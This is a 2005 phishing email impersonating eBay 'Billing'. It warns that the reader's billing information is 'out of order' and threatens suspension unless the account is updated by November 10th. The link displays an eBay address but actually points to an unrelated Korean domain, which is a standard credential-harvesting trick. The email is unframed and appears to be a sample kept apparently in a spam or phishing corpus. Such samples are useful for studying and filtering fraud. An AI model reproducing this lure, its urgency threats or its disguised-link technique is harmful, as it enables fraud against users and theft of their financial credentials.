Subject: eBay Security Validation - Update Account Notizc

From: <[email-masked]>
Date: Thu, 3 Nov 2005 16:57:10 -0500

<html>
<br>Dear eBay Community Member,
<br>It has come to our attention that your eBay billing informations are
<br>out of order. If you could please take 5-10 minutes out of your
<br>online experience and update your personal records you will not run
<br>into any future problems with the online service. However, failure
<br>to update your records will result in account suspension. Please
<br>update your records by November 10th.
<br>
<br>
<br>Once you have updated your account records your eBay session will not
be
<br>interrupted and will continue as normal. Failure to update will result in
<br>cancellation of service, Terms of Service (TOS) violations or future
<br>problems.
<br>
<br>To update your eBay records click here:
<br><a HREF="http://expo93.co.kr/ws/ebayISAPI.dll/UPdate/index.html"
target="_self">http://cgi1.ebay.com/aw-cgi/ebayISAPI.dll?UPdate</a>
<br>
<br>Thank you for using eBay.
<br>
<br>Regards,
<br>eBay Billing
</html>

knsexp